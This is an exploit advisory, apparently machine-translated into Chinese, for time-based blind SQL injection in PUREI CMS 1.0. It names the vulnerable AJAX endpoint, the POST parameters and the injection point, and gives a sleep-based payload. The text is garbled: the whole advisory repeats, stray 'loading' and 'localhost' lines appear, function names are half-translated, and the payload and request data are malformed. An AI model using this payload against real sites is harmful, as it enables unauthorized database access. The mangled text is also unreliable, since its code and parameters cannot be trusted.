#利用标题: PUREI CMS 1.0 -SQL注入
#日期: [27-03-2024]
#利用作者: [数字7]
#供应商homepage: [purei.com]
#版本: [1.0]
#测试在: [Linux]
_______________________________________________________________________________________________________________________
简介:
SQL注入漏洞允许攻击者通过操纵修改后端SQL语句
用户输入。当Web应用程序接受用户输入直接插入的用户输入时,这种注入会发生
进入SQL语句,而无需有效过滤危险字符。
这可能会危害数据库的完整性或揭示敏感信息。
_______________________________________________________________________________________________________________________
基于时间的盲目SQL注入:
脆弱的文件:
提出一个以AM输入集为:的值
if(now()=sysdate(),睡眠(9),0)/'xor(if(now()=sysdate(),sleep(9),0))or'xor(if(if(now(now()()=sysdate(),Sleep(9),0),0)或'///*/
确保URL编码输入。
SQL注入:
Method:发布请求
可验证的文件:
/Includes/events-ajax.php?action=getMonth
帖子REQ:的数据
月=3Type=年=2024CAL_ID=1 [在此处注入]
#日期: [27-03-2024]
#利用作者: [数字7]
#供应商homepage: [purei.com]
#版本: [1.0]
#测试在: [Linux]
_______________________________________________________________________________________________________________________
简介:
SQL注入漏洞允许攻击者通过操纵修改后端SQL语句
用户输入。当Web应用程序接受用户输入直接插入的用户输入时,这种注入会发生
进入SQL语句,而无需有效过滤危险字符。
这可能会危害数据库的完整性或揭示敏感信息。
_______________________________________________________________________________________________________________________
基于时间的盲目SQL注入:
脆弱的文件:
正在加载...
localhost
正在加载...
localhost
if(now()=sysdate(),睡眠(9),0)/'xor(if(now()=sysdate(),sleep(9),0))or'xor(if(if(now(now()()=sysdate(),Sleep(9),0),0)或'///*/
确保URL编码输入。
SQL注入:
Method:发布请求
可验证的文件:
/Includes/events-ajax.php?action=getMonth
帖子REQ:的数据
月=3Type=年=2024CAL_ID=1 [在此处注入]